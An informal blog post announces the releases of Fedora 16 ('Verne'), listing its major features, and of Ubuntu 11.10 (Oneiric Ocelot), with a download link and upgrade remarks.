Today , Fedora 16(codename "verne") Linux Released, powered by the newly released Linux kernel 3.1, it features the GNOME 3.2.1 desktop environment with the GNOME Shell interface and the KDE Software Compilation 4.7.2 environment. Fedora 16 includes OpenStack, lots of SELinux enhancements, updated Haskell, Perl and Ada environments, Blender 2.5, Boost 1.47, TigerVNC 1.1, and much more.

The following are major features for Fedora 16:

  • Enhanced cloud support including Aeolus Conductor, Condor Cloud, HekaFS, OpenStack and pacemaker-cloud
  • KDE Plasma workspaces 4.7
  • GNOME 3.2
  • A number of core system improvements including GRUB 2 and the removal of HAL.
  • An updated libvirtd, trusted boot, guest inspection, virtual lock manager and a pvops based kernel for Xen all improve virtualization support.
Full feature list here

Fedora 16:

Ubuntu 11.10(Oneiric Ocelot) is Released ~ Upgrade Now


Recently, Ubuntu released Ubuntu 11.10.  If you interested to know how it will look like or how it works, you can take this tour. It is available in 38 language.  Ubuntu is free to use. if you haven't use ubuntu yet, then give a try now with Ubuntu
11.10.

You can download the full operating system from here:
http://www.ubuntu.com/download
or
if you have installed ubuntu 11.04 , you will be asked to upgrade to Ubuntu 11.10(that's how i come to know about it).
  
Ubuntu 11.10: Open for business
Make your IT budget go further with Ubuntu! The latest release of Ubuntu includes everything you need for your business desktop, server and cloud.

The user Interface looks good. I am curious to use it now itself but my net connection.

Few Screenshots: